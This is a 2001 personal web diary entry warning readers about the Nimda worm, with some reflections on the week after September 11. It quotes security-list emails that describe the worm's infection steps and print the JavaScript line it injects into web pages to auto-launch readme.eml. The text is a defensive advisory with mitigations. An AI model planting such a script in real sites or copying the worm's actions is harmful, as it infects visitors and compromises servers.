| Tuesday, September
18, 2001
WORM WARNING
More later, but apparently ANY USER OF Internet Explorer 5
including end users may be vulnerable to this. My advice is to not do web
surfing with Internet Explorer until you are sure you are not vulnerable.
More when I know more. That MAY BE IN
ADDITION TO:
re: I'M HAVING TROUBLE reaching a lot of Internet
sites this morning. Are you? - Glenn Reynolds, 9/18/2001 10:51:05 AM
Glen,
A new IIS (internet information services) worm is
propogating this morning. One of our servers has been compromised, and we
are currently investigating it. A notice just came from the NT Bug Traq
mailing list less than an hour ago.
From: Russ [mailto:Russ.Cooper@RC.ON.CA] Sent:
Tuesday, September 18, 2001 9:21 AM To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Alert: Some sort of IIS worm seems to be propagating
-----BEGIN PGP SIGNED MESSAGE-----
There have been numerous reports of IIS attacks
being generated by machines over a broad range of IP addresses. These
"infected" machines are using a wide variety of attacks which
attempt to exploit already known and patched vulnerabilities against IIS.
It appears that the attacks can come both from email
and from the network.
A new worm, being called w32.nimda.amm, is being
sent around. The attachment is called README.EXE and comes as a MIME-type
of "audio/x-wav" together with some html parts. There appears to
be no text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not quite
right with an email.)
The network attacks against IIS boxes are a wide
variety of attacks. Amongst them appear to be several attacks that assume
the machine is compromised by Code Red II (looking for ROOT.EXE in the
/scripts and /msadc directory, as well as an attempt to use the /c and /d
virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.
One thing to note is the attempt to execute TFTP.EXE
to download a file called ADMIN.DLL from (presumably) some previously
compromised box.
Anyone who discovers a compromised machine (a
machine with ADMIN.DLL in the /scripts directory), please forward me a
copy of that .dll ASAP.
Also, look for TFTP traffic (UDP69). As a safeguard,
consider doing the following;
edit %systemroot/system32/drivers/etc/services.
change the line;
tftp 69/udp
to;
tftp 0/udp
thereby disabling the TFTP client. W2K has TFTP.EXE
protected by Windows File Protection so can't be removed.
More information as it arises.
Cheers, Russ - Surgeon General of TruSecure
Corporation/NTBugtraq Editor
My thanks to Dan Spisak and Robert Racansky for the
warnings.
It is one
week after the attacks. It is time to rethink: what do we want to
accomplish, and what shall we do. I will leave
that material under the heading Black
September War, which is still the best name I have for our condition;
but understand it may not be a war at all. We will see. But until we know
what we WANT, not just now but in the long term, we are unlikely to
accomplish much. Actions now will affect what we can do in the future. I
continue this at length in another place. There
is also a great deal of mail on the subject, far too much to post all of
it, or even comment on what I have posted. I have put that in two places, warmail
and reactions; I have tried to comment
on at least some of that I put in warmail. In any event I
have put plenty to think about in the war pages.
More on the worm:
More detail from an email on the incidents@securityfocus.com
<incidents@securityfocus.com> list.
This is a cumulation of the information i've found
on W32.nimda thus far:
W32.nimda is NOT a code red variant, and the people
who referring to it as "Code Blue" were mistaken...
The name it has been given (at least by TruSecure)
is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000
server's to infect a server, and also employ's email and web site mobile
code to infect Windows 9x/ME/NT/2k boxes.
During the initial infection of a server, the worm
does the following: - download a file named "admin.dll" via tftp
from the system that is
trying to infect the target - add the guest account
to the local administrators group and activates the account - makes sure
c$ is shared out - copies itself to c, d, and e drives - tries to mail
itself to email addresses that it discovers on the server - creates a file
named readme.exe, which is used in the mobile code inserted on the web
sites below - add this string to the web pages found on the server:
<html><script language="JavaScript">window.open("readme.eml",
null, "resizable=no,top=6000,left=6000")</script></html>
- scans for and infects other vulnerable IIS servers - goes through all
shared directories and puts sample.nws, sample.eml, desktop.eml,
desktop.nws in each directory. these are eml messages with copies of
itself (readme.exe) autoloaded by the mobile html code mentioned above. -
goes through all shared directories and puts riched20.dll in each
directory, which is a trogan dll version of W32.nimda that is meant to
infect people running notepad/wordpad in that directory. - puts a trojan
mmc.exe in the winnt directory that is a copy of itself in the above
"readme.exe" format (win2000 only)
If a user views a web site that is hosted on an
infected server, the following happens: - upon viewing an infected page,
the mobile code extracts to readme.exe and starts in windows media player
(without user intervention) - the user's machine becomes infected with
W32.nimda at this point and time - the worm starts scanning for other
vulnerable IIS servers - the worm emails itself to everyone on the user's
address book - goes through all shared directories and puts sample.nws,
sample.eml, desktop.eml, desktop.nws in each directory. these are eml
messages with copies of itself (readme.exe) autoloaded by the mobile html
code mentioned above. - goes through all shared directories and puts
riched20.dll in each directory, which is a trogjan dll version of
W32.nimda that is meant to infect people running notepad/wordpad in that
directory. - puts a trojan mmc.exe in the winnt directory that is a copy
of itself in the above "readme.exe" format (win2000 only)
It us unknown to me what happens (at this point in
time) if a user opens an attachment that is sent from an infected site. It
is possible that it could automatically infect the user's computer using
the same methods mentioned above.
EVERYONE who uses internet explorer to browse the
internet should probably do one of two things to stop from being
automatically infected by W32.nimda (i have not tested whether or not
turning off javascript fixes the problem): o) don't browse web pages until
microsoft releases a patch o) turn OFF javascript
EVERYONE who uses outlook/outlook express should,
at the very least, not open any attachments that they are not expecting.
Turning off auto-preview might be a good idea as well.
Slashdot has an article discussing this: http://slashdot.org/articles/01/09/18/151203.shtml
-- "Computer games don't affect kids, I mean if
Pacman affected us as kids, we'd all be running around in darkened rooms,
munching pills, and listening to repetitive music." ~unknown **** Jim
Olsen Systems Administrator CyberJunkees ****
Jim Kershner IT Director
...
"I used to work in a fire hydrant factory. You
couldn't park anywhere near the place." -- Steven Wright
This was in response to my mailing to
subscribers:
-----Original Message----- From: Jerry
Pournelle [mailto:jerryp@earthlink.net] Sent: Tuesday, September 18, 2001
11:58 AM To: Jerry E. Pournelle Subject: WORM WARNING from Chaos Manor
Importance: High
There is a new worm that apparently can
affect all users of Internet Explorer 5.0. We do not know about other
versions of IE. Apparently Opera, Netscape, and other web browsers do not
have the security hole that allows this one.
Advice: don't browse the web with Internet
Explorer until you have found and installed a critical update that
addresses this matter. I do not know that such exists but certainly there
will be one.
Be very wary just now.
More when I know more. I am told this is a
serious threat.
Jerry Pournelle
I have mail from many reliable
sources: there is a crisis. Turn off JavaScript. Be careful where you
visit with Internet Explorer. From
another source:
Virus Alert
Be on the alert for an email borne virus with the
following characteristics:
Name of attachment: README.EXE
Description: This is the preliminary information
known at this time. There is a new mass-mailing worm that utilizes email
to propagate itself. The threat arrives as readme.exe in an email.
In addition, the worm sends out probes to IIS
servers attempting to spread by using the Unicode Web Traversal exploit
similar to W32.BlueCode.Worm. Compromised servers may display a webpage
prompting a visitor to download an Outlook file which contains the worm as
an attachment.
Also, the worm will create an open network share
allowing access to the system. The worm will also attempt to spread via
open network shares.
For more information refer to: (Aliases:
W32.Nimda.A@mm, W32/Nimda-A)
Sophos: http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
Symantec: http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html
The reason I have not been sending out exhortations to my
readers not to go about bombing Mosques and shooting people with turbans
is the same reason I don't exhort you not to set the cat on fire and not
to poison or drown your children and not to go to grocery stores and spit
in the milk. There are people who do this sort of thing, I
suppose, but the number who read my books and come regularly to this site
must be quite small, and the number who both come here and would have
their actions affected by such messages is the empty set. But
just in case, please don't be beastly to your neighbors. And Never
set the cat on fire, you only will annoy it
the heat will make the beast perspire, it surely won't enjoy it,
Likewise do not ignite the dog, the snake the gerbil or the frog,
and never set the cat on fire. Yes, I know: there are those
who have been beastly to their neighbors. They are hardly likely to come
here for advice.
Thanks to Rod Davenport we have
details on the worm warning. See
mail.
TOP |
CLICK HERE for
a Special Request. 
